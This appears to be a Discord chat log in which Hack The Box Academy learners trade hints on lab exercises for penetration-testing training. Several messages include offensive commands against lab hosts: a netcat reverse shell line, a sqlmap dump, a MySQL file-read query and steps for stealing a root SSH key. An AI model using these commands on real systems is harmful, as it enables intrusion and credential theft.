http://178.62.107.21:32468/index.php?language=languages/en.php
After respawn:
http://206.189.117.48:30013/index.php?language=en
Or maybe I did something wrong without noticing it. No idea.
ah i see what u mean
The language selection on the website triggered these requests.
Hey, I am stuck at module "Getting started" 'pentesting basics/privilege escalation'
I am logged in the server as user2, but do not know how to get to root
@short brook take a look inside ||/root ||
specifically there is something we can do using|| ssh keys|| to help us escalate to root 😉
Guys, what does it mean when we don't receive any response to a request in Burp ?
uhh
@west canopy do u happen to know which acc on MS01 i can log into using the creds from SQL01
I'm literally gonna cry. I don't understand ssh and the keys and whatnot
i ran ||lazagne|| and found the ||DefaultPassword||
what about ssh and keys do u not get
@foggy stirrup the user should be ||mssqlsvc|| .... i think i dumped the password with ||lazagne|| but its kind of unclear in my notes... the password is in a weird format and kind of hard to see
SSH private keys are basically passwords u can use them to login
yeah this
i got this
but it cant login weirdly
I've been waiting for a long time and nothing :/
I understand that I can login with them, but howwwww????
well ... if the server replies with a 200 then it's a success... and a 404 means the resource doesn't exist
what does it mean if we don't get a response from the server?
u pass it in as -i
On attacking common services - DNS. Seen similar posts in here about finding one or MANY subs based on the tool used, im in the same boat. Found ||hr.inlanefreight.htb|| which seems to be the best lead, but unable to enumerate anything useful. A nudge would be appreciated 🙂
Bruuu, I'm new to this... What should I pass in where? Explain it slowly. If you can dm me
That's the thing, I am using the repeater to send a post request and when I click on 'send', nothing, no response. When I try the request manually with the browser, the server does respond so the problem doesn't seem to come from the server
@short brook we want to make a copy of the id_rsa file so we can have one on our attack machine. From there, we can run chmod 600 against the id_rsa file, and then use it to SSH in as the root user.
How do I make a copy? I don't have permission as user2 to do anything
DM me 😉
So I'm on the web proxy module I need to locate the second flag I can see the root directory, since the clue is that the flag is in a different directory I know it's there but how do I get into it. I'm pretty sure I followed the breadcrumbs but just ended up back with the original flag
can't we just|| cat /flag.txt|| ?
For the first flag
maybe|| flag.txt ||and|| /flag.txt|| are different...?
Thank you
hi there
at the moment i'm at the module metasploit. the section encoders did really catch my attention...
at the end of this sections it is written: As expected, most anti-virus products that we will encounter in the wild would still detect this payload so we would have to use other methods for AV evasion that are outside the scope of this module.
Does Anybody know if there is another Module at htb academy who is going deeper into that field - encoders and eventually malware analysis?
Hi I'm working on the wordpress module for the skill assessment. I have gotten access to the ||erika|| account but I cannot update the theme editor since I keep getting this error: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means such as using SFTP.
Does anyone know how to fix this?
Currently, to my knowledge, there are no such modules.
Who can help get my ssh key
ok thanks.
in this course they shared some links that explain SGN deeper.
there are also other articles that explain for example ransomware, in case somebody else is interested to learn more in that field, just explore these links ;)!
I have just learned this today. DM me and I'll help you
AD Enumeration & Attacks - Skills Assessment Part II
Who has faced the following issue before while escalating privileges using PrintSpoofer.exe?
c:\Users\Public\nc64.exe 172.16.7.240 4444 -e cmd: forward host lookup failed: h_errno 11001: HOST_NOT_FOUND
Mind if I ask how you solved this issue? I am also running into it
hey can someone please help me?
I cannot seem to figure out how to load this unsigned powershell module.
I try to use the set-execution policy directive but I don't understand what I am doing wrong ...
make sure you download the right one etc and check the proxy cfg file
or else yeah go ahead and ask pm
Ah, cool, thanks! I have to run out, but I'll look into it more later.
Can anyone point me in a direction with decoding the flag for the web proxy module. I'm running it through burp encoding it with url and base 64 as the hint said and I'm getting no where
Maybe we have to ||base64 decode multiple times?||
EDIT: which section/question are you on?
That's not working
I'm on encoding/ decoding the challenge states: the string found in the attached file has been encoded several times with various encoders. Try to use the decoding tools to get the flag. Hint use base 64 and url encoding. I've encoded the string with both multiple times. I've tried to decode the string with both i
yes try base64 decoding multiple times
then switch to a different type of decoding 😉
I know its right in front of my face and im just missing it however, I need to do the scan for the Public Exploits module and I can not think of what I should use to scan it with. I know nmap only works for devices on your local network/vpn. What am I missing?
TLDR: How do you scan IP's that arent on your network again?
try navigating to the target:port in your browser using http protocol
Hello, I'm new to HTB and have newbie issues. I'm on the module HTTP Headers and I have found flag_...., but when I paste it into the answer section it says it is not right. Am I supposed to find a way to open the .txt file?
make sure you don't have any formatting errors like a trailing space at the end
Ok I will give it another shot after I get another instance tomorrow
Doing the Setting Up module, I'm right at the end, hardening my VPS, but now that I'm trying to log back in after setting up 2FA I'm getting this error
Permission denied (publickey)
can you undo the change ?
Restoring sshd_config seems to fix it
erm so that error is from ssh
make sure public key use is enabled + you have the right keys in authorized_keys
can i dm u
Could I have help with the session security skills assesment?
I am confused what it is wanting me to do haha
I found an XSS endpoint -- was pretty easy
I also know how to do session hijacking with XSS.
try to use some of the ||cookies stealing|| methods shown in that module, after you've got the url payload send it to the given api so the admin can click it
I guess my question is how do I submit my malicious url to admin?
I see the /submit-solution page
with the given api
yep that one
Something like this?
I'm probably really stupid but I really don't know how to send with the given api
no there should be some instructions on that web page
i think it's /submit-solution?url=(your payload)
yep this one
session security skill assessment had me geeking out for three days
when i finally got it i was so hyped
i may have dropped some F bombs
and claimed myself a god
for the session security skill assessment i completely forgot about the api so i was stuck for a few hours trying to figure out what to do next
Hi all, in the Skills Assessment - WordPress the error "Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP." is it normal or have i just broken the machine?
or this is just not the way?
I don't remember the skills assessment being too difficult
Probably overthinking it
there's a little twist
with the ||blog ||page
unless you set the vhost, then it looks like the target isnt wp
I already have the blog and the girls name and password
im trying to get the payload working on the template
but wordpress gave me that error
changed the admin password and tried to login with admin and change the template but it wont let me
try with themes instead of template
i tried on 404.php, archive.php, etc
did you do that with the twenty nineteen theme?
can I dm you?
sure
Did you ever get the Advance File Disclosure to work?
With the Advanced File Disclosure did anyone have trouble with the CDATA or the Error based way to get the data?
No dice, still didn't work
Did you ever find a fix for this?
Hi, just want to check for Attacking Common Services - Easy is the correct path to get the flag going through ||the sql and creating a webshell and then trying to get a reverse shell from there?|| Seems kind of over complicated to me. Maybe im just bad.
The easy one feels like medium/hard and the medium one is really easy haha.
I know for that one there is two ways to solve it. There is a ||ftp route ||
do i HAve to keep it legal
Yes.
I just finished the "getting started" module, and I wanted to verify for the Knowledge Check.. was it actually possible to recover the username/password ? I ended up solving it with help from metasploit, but I spent a week and a half trying to figure out how to manually tackle the task.
hi for downloading all files in ftp there is this command wget -m --no-passive ftp://anonymous:anonymous@<target> but how do i download all from non-standard port?
sorry
Can anyone help me on after almost the whole day. :<Attacking Common Services - Hard the last part on flag.txt? kinda lost
Is the Username Brute Force module missing a username wordlist? I can't find the one they say to use and I've tried many different things.. I overcomplicate things often so I know that's likely the case here I'm just stuck.
JFC nevermind I'm stupid. By 'section' I thought they meant earlier on the same page.
Can I get a hand with the footprinting lab - hard? I am struggling with the SNMP walk.
i'm not sure if i remember this correctly but you can bruteforce it with ||onesixtyone and then braa||
Thanks @timber light. I tried and discovered that I'm not doing it right.
Can I DM someone about Chisel section in Tunneling, Pivoting and Port Forwarding module?
Hey, i am doing the footprinting module > the medium skill assessment lab. I managed to log in with a privileged account but when i check the database it's empty. am i missing something?
@fathom bay DM me
hi i need some help with the Footprinting module DNS section last question i found 20 subdomain try to do a dns zone transfer with all of it and try the dnsenum tool show in that section with all 20 subdomain but no luck
If I can remember correctly, you need to enumerate subdomains of one of the found subdomains
You need to find all the zones.
Remember that there are servers that do not allow zone transfer from everyone.
I'm a bit confused, do we necessarily need the VIP membership to start hacking some machines on HTB ?
yep i'm trying this no luck
ohh ok
i'm confused about that too but no without vip you can only hack the machine or box that are live right now
So it is not possible to hack retired machines without vip ? Here https://app.hackthebox.com/vip it says 2x Machines for the free plan and 190+ Machines for VIP
no idea i think 2x Machines mean you can only access 2 retired machine maybe?
I think so, I tried to start the instance of the easy machine You know 0xDiablos and it worked, but for others it asks for the VIP subscription
Has anyone had, and found a fix for the libcrypto.so issue with ptunnel on the target machine in the Pivoting with ptunnel section?
is hack the box crashed?
i'm trying to connect but it responds with bad gateway error
yes looks like some webserver issue
It seems to be down just now, please just wait a couple minutes
no problem it was just for info
got it thanks @brave prawn @acoustic owl and i'm so dumb, i found the right subdomain but i can't do a dns zone transfer with it so i didn't even check that subdomain ip 🤣🤦♂️ got stuck for a good while
Hello on the module Web proxies at Repeating Requests https://academy.hackthebox.com/module/110/section/1051
I don't know how to find the other flag. The hint says it is in another directory but how can I change directories from burpsuite?
I tried "cd .." but it doesn't work
HI, anybody on Penetration testing process?
I think there is an error on a question: What is the name of the security regulation for credit card payments a company must adhere to?
use ls to find the flag and use cat to get the flag you don't cd
that question sounds familiar what the module?
and section
use ls with a different directory
Penetration Testing Process. Section Post Exploitation. Ask for Security regulation but the answer is almost the same under Framework.
how can I do that ? Give a an example pls
Ask for Security regulation but the answer is almost the same under Framework.
So, not sure if it is ok or I am wrong.
oh i thought that was the web info module or something but sorry i haven't done that module yet, but i'm sure someone who has will help you on that
ls (different directory) so example if you want to list file in /opt use ls /opt and pls do the linux module
so I should try ls root for example ?
I know the commands but I am now learning burp sweet so it is a bit unusual
I did pwd and I am in /var/www/html.
in burp you can just run normal linux command just url encode that with ctrl + U
and yes try this
I think I am doing some mistakes somewhere
shoot me a dm if you still have issue that
pm me
^ so true
I just finished the Getting Started module. I feel so refreshed. Now Imma take a nap🤣
I remember that module being brutal for a beginner haha
Plus Nibbles is a horrible first box to do
It was awful yes, but atleast I learned something. Now I have to start with Network Enumeration with NMAP
hopefully next year amd drop a 32 core cpu @ 8.6 Ghz
and all their cpu have a boost frequency of 8.6 Ghz
and some big cpus of 64, 128, 256, 512 cores
for server and work station
hey can anyone give me a nudge on how to start the footprinting hard lab? i did an nmap and only got an imap/pop3 server and i cant get anything out of it cause i think i need a login
Could someone give me some help on DNS Footprinting on the last question What is the FQDN of the host where the last octet ends with "x.x.x.203"?"
Dm me 😊
is there someone that can help me with the public exploits section of getting started?
@rigid minnow DM me
try snmp walk
Attacking Common services - easy. Have creds for ||fiona||. Found the ||.txts in the mysql database and what they curl||. Based on past labs, this is a hint to put a ||reverse shell in one of the directory's in the .txts||. Have been unsuccessful in doing so, would appreciate a nudge :). Also tried to ||deliver payload via mysql for rev shell||, no bueno
Yes of course, DM me
guys im trying to enum the user names in the Footprinting Module / SMTP
Downloaded the footprinting wordlist and using this command
||smtp-user-enum -M VRFY -U /home/kali/Desktop/footprinting-wordlist.txt -t 10.129.xx.xxx||
but it gives me 0 results
i even checked the next section and there is the answer so i modified my wordlist with just that name and tried again
still 0 results.
i dont get it
so the metasploit method worked fine
but i do not understand why the smtp-user-enum didn't work
thank you so much!
Can I get help with the footprinting Lab - Hard. I have access to the db and having trouble with decryption. 🙃
someone send me windows xp
if you check ||fiona|| user privilege you'll find she has ||FILE privilege|| means she can read local files with the command ||select LOAD_FILE("path to the file here");||
for smtp-user-enum your command is missing the domain, needs to be added with ||-D <domain here>||
Do I need a specific wordlist? I'm stuck
what are you trying to decrypt? if you've access to the db what you're looking is on the ||users table||
The hashes I found in the db? Trying to get to the HTB, didn't find that but other creds...
you don't need the hashes, once on the server you can list all databases available in there and use ||select * from users;|| you'll eventually find the pass
May I dm you?
sure
If im not getting scan results should i just reset the box
on attacking common services hard
dead
Hey, anyone here done the Linux PrivEsc Assessment? I've had to skip flag1 and after finding 2,3,4 i decided to circle back.
I've found the ||cat /var/www/html/flag1.txt entry in ./bash_history|| but the actual file doesn't exist. **Is this just a red herring?**
I've also used find / -name flag1.txt 2>/dev/null and the file can't be found.
@fringe shell check for hidden files/folders 😉
@west canopy thanks for the help... privesc to root gave me less trouble than that dang flag
For Pivoting, Tunneling, and Port Forwarding with SocksOverRDP, I am having a spot of trouble. I have SocksOverRDP running on the connection with username:victor and I have Proxifier configured for 127.0.0.1:1080, but when I try to use mstsc.exe from the main target to connect to the final target, it keeps telling me the Remote Connection won't work, and it doesn't show up in Proxifier. What am I doing wrong? For serious? It didn't like me running mstsc.exe from an Administrator command prompt. 🙄
Has anyone done the Footprinting module for the DNS challenges? Finding the FQDN that ends in x.x.x.203 has me stumped. I tried zone transferring to every subdomain and brute forcing with multiple word lists. Coming to a dead end tbh
Anyone able to help me out on Attacking Enterprise Networks Post Exploitation? I've got everything in place but no shell after running dc_shell.exe
Hi, I'm new to HTB and currently stuck at Footprinting FTP. The question is "Which version of the FTP server is running on the target system? Submit the entire banner as the answer." I thought it was "220 InFreight FTP v1.1" but it seems not correct. is there any way to find the answer? thank you
so how can i get to the right answer
I cant tell you that
The same thing is happening to me, were you able to solve it?
I think you'll find it works if you get rid of the 220
Okay, I am stuck on Question 3 of the Skills Assessment for Pivoting, Tunneling, and Port Forwarding if someone has a moment.
it doesssss, thank you !!!
what was the question again?
I found the credentials for ||mlefay|| and I thought I found the first internal server, from the webshell, at ||172.16.5.15|| but that seems to not be the answer to the question, so I'm not sure what I'm otherwise looking for, or where to go from here.
have you run a ||ping sweep scan?|| if you did, you'll find another host on that network
See this is why I need to organize and maybe color code my notes. I thought I could only use msfconsole for that. I completely overlooked using code for it. Thanks.
Hmmm. It's tossing back ||ping: 172.16.5.{1..254}: Name or service not known||
try the one liner command instead
This is what I used: ||for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done||
try this ||for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"||
No dice. Doesn't give me anything. As a side note, I kinda hate this webshell.
DM
anyone can DM if they know, i spent too much time on it skipping it for now.
DM me 😉
@vale salmon do you still need help with port forwarding skill assessment?
Not at the moment, but thanks!
Anyone able to help me out on Attacking Enterprise Networks Post Exploitation? I've got everything in place but no shell after running dc_shell.exe
Hey guys
I cannot get the flag on the Server Side Attacks - SSTI I
I got the shell connected to the target but I don't understand how to access the environmental variables
example 1,2, or 3?
yes, the double hop messes up kerberos
https://academy.hackthebox.com/module/143/section/1573
Is there something more that needs to be done beyond all the commands the sections lays out?
@night pier DM me 😉
example one
I've tried using the shell and ||{{dump()}}||
sec i will DM
Hey Guys,
can anyone help me in the Module Password Attacks ?
Im stuck at crackmapexec and the smb user
i enumerated the credentials and also the share, but when i make the ls command, it says status denied. And its the only free share. What am I supposed to do
Are you using an account that has read access to the share?
i have the same problem
So is there any idea when the CPTS exam will actually be released?
Can anyone help with the Password attacks module - Password mutations?
The scans are running too slowly to be able to complete in the time the box gives you, both on my Kali VM and PWNBOX
hello
i am stuck at the final section of SQL injection
can anybody help me to solve loginpage
have you got anywhere with it at all?
make sure you're not forgetting the space
The aim is not necessarily to login...
Hello! I'm stuck at Skill Assessment - Broken Authentication. Who can help me? I can explain my problem in private chat, because there may be many clues for others
but i think log in will help me
please give me some hint to log in
dm me what you have tried
thanks for asking buddy
Good, took me a while to finish my password attacks module to be able to spin up that box to remember what I had to do
can I DM you when I'm stuck?
You can, if I can remember or am not in the middle of another long scan I'm happy to help!
Hello, I need help with Attacking Common Services - Easy. What I already did: I found two txt files on the ftp server. I noticed that I can write and read files with MySQL. I also noticed in the docu that I have to put my files into \xampp\htdocs to execute them. But I can't get my reverse shell working. Please, I've been stuck for about 4 hours and I'm done. Edit: Did it. I used / instead of \
Can you complete the Burp Intruder module using ZAP ?
I found 4 new users on Web App, but I can't make a wordlist from rockyou.txt. Who can help me make a good wordlist?
Did you identify the password policy ?
hey buddy i need your help
whats up?
Yes. I created command to make wordlist:
||sudo grep '^[[:upper:]]' 'rockyou.txt' | grep '[[:lower:]]'| grep '[[:digit:]]$' | grep -E '^.{20,}' | grep '[@#$]'||
14 passwords. and 4 usernames + support and guest. 6 usernames or more?
What does the OWASP Top 10 list name the classification for this vulnerability?
This is for SQL injection. I've tried every classification and cannot seem to find the right one
Can anyone help
Which of the 10 listed vulnerabilities does SQL injection fall under?
Are u having the same issue
No, trying to give a hint
also make sure you are getting the answer from the correct source
Ok thank you
Hello, I'm quite confused on where to start from? In the academy, the first course I see is penetration testing process. However, as I'm going through it, it's giving me references to other modules within it. I'm confused whether I should complete those first (e.g. networking, a 6 hour different module) or carry on with this module
In short, where do I start from as I'm a neophyte
https://academy.hackthebox.com/module/details/15 or https://academy.hackthebox.com/module/77 would be a good start, but just because it references another module does not mean you need to do that to complete the one you're on, just that it might give you a better understanding and go into more detail
Oh thank you i never got the getting started module or might have missed it
Also is there a certain guideline to follow for the modules?
Thanks figured it out now
I find it helps to select the tier you want, and also note they are not displayed in a particular order so look through and choose what you want to do next, some of the knowledge or career paths can help, but may not be limited to tier 0 if you are a free user
Hey, can I DM someone about Skills Assessment in Pivoting, Tunneling, Port Forwarding module?
Hey mate, did you already solve Attacking Common Service - Medium?
can i dm you ?
sure
I ended up just having to use Pwnbox.
@vale salmon great i may try that as well
Hi, is someone available for some help on the Skill Assessment of the module Linux Local Privilege Escalation? I got flags 1 through 4 and have a rough idea on how to get the fifth one but I can't understand if it does not work because of the type of shell I managed to create. Thanks 
dm
Hi, is someone available to help me on the final question of Getting started module web enumeration section
solved
Sorry, I'm stuck...
sudo grep '^[[:upper:]]' 'rockyou.txt' | grep '[[:lower:]]' | grep '[[:digit:]]$' | grep -E '^.{20,}' | grep '[@#$]'
Is this the right command to generate the wordlist?
Skill Assessment - Broken Authentication
||sqlmap -u http://159.65.89.165:31400/case7.php?id=1 --technique="U" --level=5 --risk=3 --dump --union-cols="1-5" --no-cast||
mine was slightly different. grep '[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:punct:]]' | grep '[[:lower:]]' | grep -E '^.{20,20}$' | grep '[[:digit:]]$' > testlist.txt
I am currently in the public exploits module of the getting started and when I try to connect to target machine it is unpingable
I have tried both being connected to vpn and not
@zealous summit not all machines respond to ICMP. The target is still there.
and you will always need to be connected to VPN to reach the target. Make sure you only have tun0. if you have more than one it will cause issues.
Thank you 🙂
Need help with Skills Assessment in Pivoting, Tunneling, Port Forwarding module. Stuck on the next to the last question, can someone help?
anyone completed Password Attacks - Password Reuse / Default Passwords that can help with "Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit then credentials as the answer. (Format: <username>:<password>)"
you should be able to just go back a few pages and grab the credentials
Can anyone help me out with the exercise given at the end in
It's the same as this user's question.
From what I've read i have to use netcat (ip) (port) but it's not working
or maybe I'm just wrong
Nevermind i figured it out. In the target it gives the port with colon but if you run it the result won't show up
you have to add space between the port and the ip
Any chance someone could give me a nudge on 'Skills Assessment - Website' for the Login Brute Forcing module? I feel like I'm missing something fundamental but simple..
Hello on Windows Privilege Escalation; DnsAdmins section I followed the steps and I added myself to Domain Admins group but I still get access denied on everything and can’t read the flag, any help?
what question?
Just the first one. I'm trying something though, standby.. I forgot about one of the sections, but I think I might know what to do.
simple hydra command will do.
Yeah something I haven't really understood is isolating which wordlist(s) to use. rockyou.txt would take forever so I'm just trying what I can.
I understand that. I used the same wordlist they used in the examples. ftp-betterdefaultpasslist.txt
Ah, good catch. Thanks!
Gah I have such a problem overcomplicating things. I got it, thanks @lethal atlas
yw
someone can help me to find the right exploit for Simple Backup plugin 2.7.10 for wordpress
have you tried using searchsploit
yes
i have found this exploit but nothing happen auxiliary/scanner/http/wp_simple_backup_file_read
need help Password Reuse / Default Passwords for mysql in module Password Attacks. Have tried all previous user:pass but no luck
is the question of getting started module section public exploits
Hey! Happened the same to me. Log off session or restart target aka windows. that should work.
How can I do that?
when you have done all the procedure, on your windows target, go to windows icon and restart. then connect again with remmina or other.
It wasn't possible to restart the computer but I could sign out and then reconnected with RDP and had the privileges. Thanks!
im on public exploits in getting started
and I can't seem to complete an nmap scan in any kind of reasonable time, my first scan with just -Pn took so long my target system reset
can anyone confirm whether or not we should be trying to exploit filtered services?
or ignoring those
YES BUT THE OTHER PEOPLE ARE DOING BAD THINGS
I am connected to the academy vpn, is there anything i should look at
@zealous summit try to ping
ping: 178.62.91.197:30269: Name or service not known
@zealous summit That looks like a web site since it has the ip and the port
--- 178.62.91.197 ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3072ms
@zealous summit try see if you can access the web site
no response from curl or browser
OH GOOD grief, thank you for advice about checking it as a website
typically docker targets won't be pingable 😉
are you connected to vpn?
if there is a port designation, such as 178.62.91.197:30269, you can't use the whole thing for ping or nmap. The 30269 is the port number, so for nmap leave it off or specify it with -p. As far as pinging, like @west canopy said, if it's a docker it likely won't respond.